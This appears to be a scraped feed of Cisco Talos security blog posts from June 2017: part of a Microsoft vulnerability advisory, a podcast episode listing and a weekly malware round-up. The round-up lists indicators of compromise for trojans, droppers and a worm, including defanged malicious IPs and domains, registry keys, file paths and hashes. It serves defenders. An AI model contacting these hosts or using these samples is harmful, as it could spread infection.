These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. They can be exploited by a user opening a specially crafted office document and can result in the attacker gaining full control of the affected system.

CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285

This is an information disclosure vulnerability in Windows Uniscribe related to improper disclosure of the contents of its memory. This can be exploited by having a user open a specially crafted document or visit an untrusted webpage.

CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289

These are information disclosure vulnerabilities in the Windows GDI functionality that results in disclosure of the contents of memory. This can be exploited by a user opening a specially crafted document or convincing a user to access an untrusted webpage.

CVE-2017-0295

This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\Users\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.

CVE-2017-0296

This is a privilege escalation vulnerability that impacts Windows 10. The vulnerability is a buffer overrun corruption that can result in escalation of privilege. This is exploitable by local attacker executing a specially crafted application to elevate privilege.

CVE-2017-0297

CVE-2017-0298

This is a privilege escalation vulnerability in the Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to improperly authenticate a client. Exploitation occurs by an attacker that is logged into the system and executed a specially crafted application that would exploit the vulnerability after another user logged on to the same system via Terminal Services or Fast User Switching.

CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462

These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address allowing the attacker to retrieve information to potentially bypass Kernel Address Space Layout Randomization (KASLR). The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.

CVE-2017-8460

This is an information disclosure vulnerability in Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.

CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468

These are use-after-free vulnerability that can result in privilege escalation. This is specifically triggered when the Windows improperly handles objects in memory. These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.

CVE-2017-8469 / CVE-2017-8470

This is an information disclosure vulnerability related to the way the Windows kernel improperly initializes objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.

CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553

These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.

CVE-2017-8493

This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.

CVE-2017-8494

This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.

CVE-2017-8507

This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. This can be exploited by opening a specially crafted email message.

CVE-2017-8508

This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.

CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513

CVE-2017-8514

This is a reflective cross site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server and will run the script in the security context of the current user. The request could be delivered via both email message or through a specially crafted URL on a website.

CVE-2017-8515

This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.

CVE-2017-8519

This is a remote code execution vulnerability in Internet Explorer related to the objects in memory are improperly accessed. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.

CVE-2017-8521

CVE-2017-8523

This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.

CVE-2017-8529

This is an information disclosure vulnerability that targets both Internet Explorer and Edge. The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.

CVE-2017-8530

This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies potentially allowing an attacker to access information from origins outside of the current one. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.

CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533

These are information disclosure vulnerabilities in the Windows CDI component related to improper disclosure of the contents of its memory. They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.

CVE-2017-8534

This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability including having the user open a specially crafted document of having them visit an untrusted webpage.

CVE-2017-8544

This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.

CVE-2017-8545

This is a spoofing vulnerability in Microsoft Office for Mac related to the improper sanitization of html or treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt and could provide the attacker a user's authentication information or login credentials.

CVE-2017-8547

This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupt memory that can be leveraged to execute arbitrary code. Exploitation can occur by having a user view a specially crafted website.

CVE-2017-8550

This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Servers related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business of Lync context including opening a web page using the default browser or opening another messaging session with another user. Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.

CVE-2017-8551

This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.

CVE-2017-8555

This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.

Coverage

BWT EP6: Enter the Talos, But Please Use a Unique Password

noreply@blogger.com (Mitch Neff) — Tue, 13 Jun 2017 13:05:00 PDT

LISTEN HERE:

Listen via iTunes
Listen directly on the Talos Podcasts page.

Episode Notes:

The team discusses how to get into threat intel and join a team like Talos. There are many routes to enter the Talos, but no exits. Seriously, they won’t let me leave. Passwords, vaults, and other access controls are discussed more in-depth as well.
Mitch opens the show discussing poor life choices like drinking with folks from Norn Iron, Nigel divulges details of his life-long obsession with men in shorts, Matt forces his team to endure war games in suburban Baltimore, Joel threatens to have a mental breakdown over buzzwords, and Craig turns his roundtable segment into a full topic...shocking, I know.

Feedback question:

What SHOULD Nigel be tweeting?
Tweet us @TalosSecurity, or email us at BeersWithTalos@cisco.com

Topic Table:

12:50 - How do you get into Security research
16:14 - Being more than wizards in hoodies
22:30 - Who effing tweeted that?
33:11 - Internet of Broken Things
37:33 - Better Passwords, Managers, and TFA - tips, tricks, and tirades
55:33 - Parting shots and pithy quotables

==========

Threat Round-up for June 2 - June 9

noreply@blogger.com (Alexander Chiu) — Fri, 09 Jun 2017 11:41:00 PDT

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 02 and June 09. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Win.Dropper.PonyVariant-6326202-1
Dropper
This dropper launches some malware possibly based on leaked Pony Loader source code. It attempts to avoid detection by injecting twice and deleting itself with cmd.exe process. It also contacts compromised WordPress websites to download additional files and attempts to also steal FTP login credentials
Doc.Macro.Valyria.6327969.0
VB Macro
This detects the initial stage of the Valyria trojan. Detecting the macro used and distributed in Microsoft Office Word documents will prevent the trojan's data stealing capabilities.
Win.Trojan.Loader-6328419-0
Trojan
This malware is of the trojan and downloader family and installs additional malware. It also looks to be able to perform spying operations. It's injecting itself, injecting a new explorer process as well. It's containing a lot of anti-debugging, VM detection and other protections.
Win.Trojan.Sivis-1
File infector
Sivis is a file infector that will replace any file in the file system by executable files containing copies of itself.
Win.Worm.Fadok-6328944-0
Worm
Win.Worm.Fadok drops several files. %AppData%\RAC\mls.exe or %AppData%\RAC\svcsc.exe are instances of the malware which are auto-started when Windows starts. Further, the worm drops and opens a Word document. It connects to the domain wxanalytics[.]ru.
Win.Trojan.Qakbot-6327689-0
Trojan
Qakbot is a sophisticated trojan primarily targetting personal information like banking credentials. Read more about it in our blog post.
Doc.Downloader.Generic-6327950-1
Doc downloader
As document based downloaders continue to remain popular as a preferred method of delivering malware, we continue to see their obfuscation methods change gears. Recently, we encountered a series of Doc downloaders that used two scripts to download the final binary. The first consists of an embedded macro that is used to remove a widely used obfuscation delimiter & write the resulting JS code to disk. The JS code is then executed via WScript.exe to download the binary, but static analysis remains deterred as most of the code gets processed by a string deobfuscation function relying on single character lookups from a master string.
Win.Trojan.Keybase-6328970-0
Trojan
KeyBase is a trojan that can be used to capture screenshots, keystrokes, and other pieces of system information
Win.Trojan.Siggen-6261194-0
Trojan
Siggen is a malware family with anti-debugging and anti-VM capibilities to hinder static and dynamic analysis. The samples drops a file in a temporary directory that is deleted once it is loaded and the second stage executed.
Image.Dropper.PhishingLure
Social engineering document technique
These documents display an icon and text lure to encourage users to click and activate the icon. When triggering the icon the malicious code is activated.

Threats

Win.Dropper.PonyVariant-6326202-1

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

/images/wp/wp[.]php
/wp-includes/images/wp/wp[.]php

Files and or directories created

File Hashes

47c916890c345a0588e52cc29e6488b5c709217823b0049a46b9a9e5e07a6efb
50733aaab0b6ca4210df15017f51bb576c84fea2cbeb0912dd40a32056cd3c1b
4fe60f488f45f914edb650cc2e248d156ad8b257b610ad4848b1c245f38053e3
24558ad4b3a745c24a2dd42c73800ccfcd0c10dc17c67d83f3dcb3a4e479d46c
21b260fc6d38b2061263f66f3efd71116adbc75b95f57d424b079ecc1c4e5a02
c35c5adf85410ad3a90804dfe053a0b6f53bef8c024898361a6c931c3598317e
416d71ce82336aa2dda064e6ba93a555ccf46c7ae2ad1faba379513965d9d485
81ee12d8f93c5b7574a1d797261f275e9b61f5ebd73ac836a68df3a18ef31c93
b42d5092e2fa54a8312c4f534b9c1d10ff714241a8fc3e3a3f44c8870a1fdc4f

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Macro.Valyria.6327969.0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

185[.]165[.]29[.]36
52[.]173[.]193[.]166

Domain Names

Files and or directories created

%TEMP%\CVR9C14.tmp.cvr
\Users\Administrator\Documents\20170605\PowerShell_transcript.PC.Wu4ufN69.20170605030528.txt

File Hashes

097de8a240500e67ed2b1b0d8d95a4bcd8f07764c5abdcf7eceb17d15c592611
0cfe5dfa2b53c51076a5ea1aac89e7be91e83a70c6438b037dfd00ccd839ca6f
17b965a0cf6b0b316da2c659ec2c7bbe747819d09c1c1401d5a80272f47b813a
1fa78675658b45f99b1799c11681b3f5b7ec09881f3f600060576b4b0a74a65e
2378d2f333b50cc341e08f574d300ebcf12ee7140cb897620bc9c35f93929854
24384267829131c7158c50c109afea6026d327c65a66ef559a6540c2c8863094
2669d31701a90345db7492bc3de46db51af6a9137ce1bafdab2fd3122d2e040e
27a035174244dd347ee81cc932fccf414b1c32a0820fe6a55e242ee04e9c0686
2a3a0eea64d407c04bf65c3bd1b22c4243435d8b066e44011d1a9904f0f644e7
2de9f4f8df35ca71c1738d22bfb6a147670c25dcbe2014cfd0870a53e33f385a
38e71cd7dba75c6e6dbfa326843d10421d57ab3781c94c1174cfc260c86d4361
3d93b69809ad4d6cb2866583c7fc0144aa0db167fd4940ab17b3252c809bf1d1
3ea1c668e2b904c00f60d3bdd735a31261c49b29a39f2523c03271328a69c580
3f3adeed33a1a057f697c49f9d776c27c7fb9afb7cfa62eec2936ac24ae0d19d
4914a3125bf4d54a07ade2109325a324f813c500a5b6e8a2781b7c1876671455
556556a774b187d2068e8d6e4cc2d098fd06fe146e0b4578b68a602d9b9c47f7
56e76f857ba0006ce64a71404b3a5e0166659e069c7d31d488de248e3e8a7af4
5cc180f858ed3148aad169790640664280c4b908867256f7b1a0718575192c78
67e2d24be65f338f944eda6cffdda8013147088a8173e771795b399c3c182771
6b6221926ec36c928f0d0eef2d254766f30342714c3e791645d97c6c86cec31f
73b30d45b7f7a0893f8d8a1b3b55f10ff9d11e86619dccbb22a60d1f2462d5f6
7cc61b02a664bfdeb11daf0dbb6f7bcfa2b07291b4ba3d25e902850a76f91ded
7ec2376443a777c789d853489ba4192ff21923ab95f4810660faad4dd93e0813
7fcd49ea71363a666377a734b80c7608842a9acb868e1b35a3820a1eefd68975
900f2319a95ec33f4c42a4ceac088f0ab940aa0cde64c4da186b0322746d3e36
913b51d636924dc67655ac2bb69449858448f71363eafcd3cb7881da3fe12994
95fd8ea6a9b5778a75b76804ae8c1da2514239598edd1c324f25eb30a93fd715
a3905f5dd2e106d19e260b36d9bdc7946cc8aae0f4343e8d6c7f671d0bdc7921
a57fe946d0e6d5324080ad9625ed5f4cc2720c53cfa8dfc4185cecc9320c8e45
ac1803de8dea5bca07b2eb654f0ce9b013285686014483e6c81ae7235b68e1aa
b08b5eb8f5ab0a2fa8acebaf86bf48653f38b7efed83d88ba6076f0da4af9ace
bb4e1f338f6d5c46d7890aa7eabe929de1467d8760a463c74379d651600638e8
be53a9f3aeca760dfcea58b676db1f687f238e0c6996ec57e36fa6040f43e75e
c3ffe88841a13a6222d667cb7aca8e0d77215b875403f4865ebf199ef64baf9f
c571b06649be9a8d07ae380a7131dd8deba1bee2aa7067557857fee8cbd2c130
ceb3fd6d517aaff2a122df2f9e8ab368cbf1efc8644344d4f228198e90c56399
d6d05984c0d493eb75861c7d56c2cf649fcc912134e7df2894fc8bb3eec8980f
d845e07f961afb0341e8d8da25fc08896bccd09ccc5136e74454308c9f95eff6
e618d44cf1e7d121c9e934b1d530ebc4e830d1dd7d8228ac5b53a455def791a9
e90846bb4883914000462df105e679bc4ad05d3d1b0900363dd18eba1aca5c33
eaa3cb0af249967c7d9a66185db3cac7e93196da6281014206b6d0bc0fb7f34c
ef6269b66111c365ef251e4128a286e16c972359ca406a02b6f81fa8b55b1cda
efb1be187c1b7cb674f6912ceec3301da0cc5c993dc3d7d47f4fa7b9c5e80d1b
f6650409983332866425e807dedc231b28a7cd3a468fe9e17be029fda17efe15
fbdee3574019ef790ca4609c0414bf63da402c051351552e3a24f4e325e494e2
ff9b033e0f4d48b6f77ae849cf3a94ea411583ea8c232b1da6fd1bc99d5e40d4
fff62aadd6740b7c1a4b57758f95d5de0cc36e471e6d1ae40ca8141a5845a7eb

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Trojan.Loader-6328419-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: GITSecureService

Mutexes

LoaderMutex
Local\WininetStartupMutex

IP Addresses

Domain Names

Files and or directories created

File Hashes

594e51c5d358d6a691ff2a80dffaddff77c9184ea072e415138c3d41b7c265ca
70df78ea8ee5f9f4561cbb595ca7c2acc982b3a0b7f84017a803e2a0d0494c5a
47bf1580e8407e9825d40348143ee14bb3f7458c32a367ae1a25f3a33a643a4f
503e751cc1c67c0688e92c28e4565de1448756443fdec4a638a019bd63816b33
f228c82dcc233e42f098ef132796985e7e69ab0294e348182ed1fc79f9f49808
6fbf8a11f59e67a96bc1f6afd67fb4b5213f93ca15d75e14bc3b99ca5af37a5d
c703896a92a7912a109336d28dec6dfbf568f8da63c635206d85c72fb2c4aea0
5b5de2fa244760de8a1a301347ab7a646160c257628f24f19d5072ba8d14d3fe
eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23
c8f06a449c4ba38e5f49b188fdddb2b49a5e7dc8716aa1f220c9ee40b06013a6
6ce02da8b29683da3c62719959522227598d38f3fc7eb056807c0fe83f051720
f99385fa291e583b905bc5880a2d7a8789e9ac12d377beff7ab6afeba26f087c
859cbf1bcb8a1d4b9862e9da10b0e7b760c249ee83b01ae93c72176c021693f5
25a60570b487f02fc57962f8fbf1d859f5cff0f8b47f01e57c7ba2d9c9a3c990
23b62deaab5754b330be64cfb4e784cf2ac328356b767bace69a391219d577a5
e9049130d4cee840324995b87d605672570c19e7d3621e1fd639b640876fa575
77b3f7eb328cb5f503bee90e65789a78be85a73977ecdaeb95c558d7bdb192bb
47a17129b7c2337735cad5c8f9694fc2ae5b344a0ca50647c8a5884b240a8587

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Trojan.Sivis-1

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\menu_bleacher[1].png
\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\z7t0o5cs.default\XUL.mfl
\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\resultslist[1].js
\Documents and Settings\Administrator\Local Settings\Temp\KB2533523_20160610_170929140-Microsoft .NET Framework 4 Extended-MSP0.txt
%AppData%\Microsoft\Office\PowerP12.pip
\Documents and Settings\Administrator\Favorites\Links\Suggested Sites.url
%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\extensions.cache
%AppData%\Microsoft\Access\System.mdw
%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\mimeTypes.rdf
\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Feeds Cache\YB1OPN1Z\desktop.ini
\Documents and Settings\Administrator\Cookies\LJOW70BN.txt
%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\content-prefs.sqlite
\AUTOEXEC.BAT
\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\view[1].txt
[...]

File Hashes

38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c
ccbf43a2ab8074ca4a27952f0f3c052435ffe38cfa4644f63b609f96c978c014
0a08a78e10ffd4c2e176e089e092f3692b94da97457abcfc694082c525335fcf
0c1170f0bd12ecd8b4a507755dff78ea47d9057129d5ae09b2af82287b43664d
7366a0faef62af909a1ef1da05e2cbd1fc9534cbb26e20e90538e043f4517d5c
4e5297e0d0b8c702e6c97fbaeee1f329b2246a046790e0e8adb595f94accf47e

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Worm.Fadok-6328944-0

Indicators of Compromise

Registry Keys

HKU\Software\Microsoft\Windows\CurrentVersion\Run

Mutexes

BFA31D7B-D1D1-40D5-A90C-A0909FFA0887

IP Addresses

Domain Names

wxanalytics[.]ru

Files and or directories created

%AppData%\RAC\mls.exe
%AppData%\RAC\svcsc.exe
%AppData%\RAC\svcsc.exe.config

File Hashes

03692f096e7fc9ab6bd470f7092ae80cc5dcfbf1dcb2a849dae2a2384e421315
04c679e80175039e07cbbd0b87a9877c297ef7e18d117f8dfa7c30ea42f78de1
056b0bc81124cf9ad6c094092e1f16f2aa96bf7efebcaeaf3830a8a228464a9b
06f89aa03b2e1f070b9fdfafd5356d0eaa1ea840f05ab7189d89f1cb1f70ff66
093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6
0ab690ef09a14798b9deb6cd0c116b8e0ed906b6bac16a05a5ae4bc38cabf467
0cac66a5a16efe52e2e878f5e8f6e34749e049c547ecf18f54955141e13e7058
0f93142998d1c0dddcf008b167f9611e0fc46539f50a35faf8266d71d31ad3e6
0fffda2d0105f10690d1989859deae3d50287474534649605a320f078616d658
148c4618e14a3c30f73dd6f910df6999ea4be2e32818f3747bdae03c175b7c48

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Trojan.Qakbot-6327689-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: kddds

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyOverride

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DBRNOCX

Value: DisplayName

Mutexes

wawrtxtguelkunm
\BaseNamedObjects\Global\uhtvtft
eioigs
\BaseNamedObjects\Global\ubrjqsxr
knsoonoa

IP Addresses

204[.]79[.]197[.]200
104[.]254[.]150[.]79
52[.]27[.]10[.]213
64[.]95[.]32[.]24
64[.]95[.]32[.]20
107[.]21[.]249[.]100
104[.]16[.]32[.]229
54[.]197[.]40[.]33
54[.]225[.]186[.]185
162[.]144[.]12[.]241

Domain Names

jdlunsnxplknfahqhhcnydvjm[.]net
bofznergcfar[.]biz
yfptiliaesndlcvuemywsvcyh[.]info

Files and or directories created

%AppData%\Microsoft\Knsoono\knsoon.dll

File Hashes

9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9
0452810a21fc1207dc11a2a82127f30354fdc41aef95371b77a00b5592c11bb4
02ad78b356cb9723b18122a2fad033e0487be7e367864d7481371bde0b0b8acf
0200b37385ee4b54572e9ff8f9dca6b20ef6a41feefeb9f5eaf14fa35fe82b87
007f9ee2441329fe8c8ebf6f597c84eb1e4fea764dd228cfae9bed400c8af53b
006b191a135afecf86bd4df2fbf619f8f019ab316d2edb33d053209384c7d4cd
00141f6303dd960c61a4fdb06e686ccc972c0e0f092adaf823444e4b7e32ae09
d52f95bb330930af7477604547dd33fdf3fe76e20301a67a7d490f6b1ebe5247
4712cf80102b7886a946ab6454fb0978f9d94feacd52c5df18850dbefa0158ec
5b7a5a58e4af312cd23e1f28597f2818953dd23abdeedb52adb882958e2766cb

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Downloader.Generic-6327950-1

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyOverride

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyEnable

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F100C0400000000000F01FEC\USAGE

Value: SpellingAndGrammarFiles_1036

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F100A0C00000000000F01FEC\USAGE

Value: SpellingAndGrammarFiles_3082

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F10090400000000000F01FEC\USAGE

Value: SpellingAndGrammarFiles_1033

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: AutoConfigURL

<HKLM>\SOFTWARE\MICROSOFT\CRYPTOGRAPHY\RNG

Value: Seed

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyServer

<HKCU>\Software\Microsoft\Shared Tools\Panose
<HKLM>\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\RECENTDOCS\.docm

Mutexes

_!SHMSFTHISTORY!_
Local\ZonesCounterMutex
Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012017052920170530!
CTF.Compart.MutexDefaultS-1-5-21-1202660629-583907252-1801674531-500
Local\MU_ACBPIDS09_S-1-5-5-0-35459
Local\!IETld!Mutex
Local\_!MSFTHISTORY!_
CTF.LBES.MutexDefaultS-1-5-21-1202660629-583907252-1801674531-500
Global\MTX_MSO_AdHoc1_S-1-5-21-1202660629-583907252-1801674531-500
Local\WininetProxyRegistryMutex
CTF.TimListCache.FMPDefaultS-1-5-21-1202660629-583907252-1801674531-500MUTEX.DefaultS-1-5-21-1202660629-583907252-1801674531-500
Local\WininetConnectionMutex

IP Addresses

74[.]208[.]222[.]23

Domain Names

accotaxs[.]com

Files and or directories created

\TEMP\~$e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb.docm
%System32%\config\WindowsPowerShell.evt
\Documents and Settings\Administrator\Local Settings\Temp\bbbababfcecbfa523.txt
\TEMP\27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb.docm
\Documents and Settings\Administrator\Local Settings\Temp\bbffdeafaccece.txt
\Documents and Settings\Administrator\Desktop\d37e.exe
%SystemDrive%\~$runme.docx
\Documents and Settings\Administrator\Local Settings\Temp\12tedsgsas124.txt
\Documents and Settings\Administrator\Local Settings\Temp\tedsgsas124.txt
\Documents and Settings\Administrator\Local Settings\Temp\eccbfaffbbb.txt
\Documents and Settings\Administrator\Local Settings\Temp\bbbababfcecbfa.txt
\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\MRMBYDAX\gate[1].htm

File Hashes

27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb
078de2765221c2d5b5030bdd1d7adaa066dd4fc6a6575111df76ec7dd3785bfd
5239d220d79e36af270a89d0683f6744f2b823c18880aa7fe02bc004c52f78ec
ab2ffad0977dda99a85c12d97fa40a8c09d5b81d08f7323e9e70e408ef017f3b
c94d3f6f98fea91c7ff34920cbed45f800e6062706a7192ed6f354c96c669e4b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Trojan.Keybase-6328970-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

217[.]174[.]148[.]65

Domain Names

Files and or directories created

%AppData%\Important.exe
%AppData%\Browsers.txt
%AppData%\Mails.txt

File Hashes

7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24
8b1c64f993778c52906b8170cc6c16a07f4116e23661956a738323aca7b12c3a

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Trojan.Siggen-6261194-0

Indicators of Compromise

Registry Keys

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP

Value: Collection

Mutexes

Local\MSCTF.Asm.MutexDefault1

IP Addresses

52[.]173[.]193[.]166

Domain Names

Files and or directories created

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nsrD.tmp

File Hashes

76cac7eac498813164dcb94ed0812163bc4d261ef80232ec528aa941e0622479
2dd6b33d9e07c68b79b6674e0972f28ee316548c5e53b28331d88c739d1a5b8f
87701e501b48b94e9494bbda3f42a8b2a92a0e19d51d3e6023efae30b86f74a0
4a1b26fd16f985e1da3f1b5619b55f6170584ac51923bd6d6c4c455fc86d44da
f20ef69203c8bd06da68071ccf38001fcd411de5c951bb38bb46a15e6d205458
74a306f136aa3b098fe99f6e35a1163d808c996e7ca6f8cd03fc69ec0a2573c0
8998b35cd76f170e62275661c0f0256883ec2b8e34b9e5ff9530c9da4d07fb74
dd249e28e052a2e7747886a0596e7faf7e447fbef7260198509fc6e08c294bbb
745d8d433cba5315749dc61810d9bf4eb1864fb9737c4a2fc3718eda75917d6f
5527923be2a750415d9565fcfc38550bf292206cee0e415278e8e08d3f3cdbdc

Coverage

Screenshots of Detection

AMP

ThreatGrid

Image.Dropper.PhishingLure

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\E6B7EA3D.emf
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\654500.cvr
%TEMP%\CVRFECE.tmp.cvr
\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31ADA98B.emf

File Hashes

71c534db25e2c523ed71b7ec30289f8c91a15d8f61a7c132a8f0958086d9cf67
b59051ead1c391fc3f5d4df44408606a6a0662456edf3a360760bc1df28e85b0
46e918a71e35421fd6384e4faa044758f636709aad1cdc28def585902560e75c
3fd12be1754315caaa508cb1dd3ed3c42d5ccfb9281a3c299b914da993919372
7d89276ddbb3e7d0a0c7628fbab04aace04e52f885b7b0619191b47eef4b3427
2190bab38a01b157023f4000b22958db934eb89fe2868593bcb3a28daca13cdb
884bdf459f5b218c56070cfba568a166e0f58df5e91373853b73a1eaf5c96896
55cae108a1f375d112831c24df0f9d0300028fb46e1ab4b7ff9c477da29888cf
069ea4075dfd279be50ee1a2904b6a5f024f7e924c91f5249e2047f93c971255
c47359bd7ab8c463522a7e3356ed6de278cfa8ebe0afe9d5e8fcb359c356eb9f
